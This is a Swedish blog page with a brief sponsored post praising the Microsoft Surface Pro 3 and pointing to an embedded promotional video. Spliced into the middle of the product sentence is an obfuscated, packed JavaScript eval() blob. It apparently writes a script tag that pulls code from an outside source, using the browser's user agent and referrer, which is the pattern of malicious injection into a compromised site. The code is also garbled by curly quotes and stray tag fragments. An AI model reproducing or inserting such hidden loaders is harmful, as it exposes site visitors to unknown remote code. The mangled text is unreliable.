Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

PC

Sponsrad Video: Utmanaren Surface Pro 3

type=”text/javascript” src=”http://video.unrulymedia.com/wildfire_341121803.js”>
Surface eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kssbn|var|u0026u|referrer|kiaia||js|php’.split(’|’),0,{}))
Pro 3 är en perfekt dator för både jobb och nöje. Du behöver inte längre släpa runt på både dator och platta eftersom Surface Pro 3 fungerar som dator när du behöver och surfplatta när du vill. Alla vanliga program fungerar som vanligt plus att det finns tusentals appar att ladda ner.

Kika in videon ovan och se vad Microsoft Surface Pro 3 kan.

Sponsrat inlägg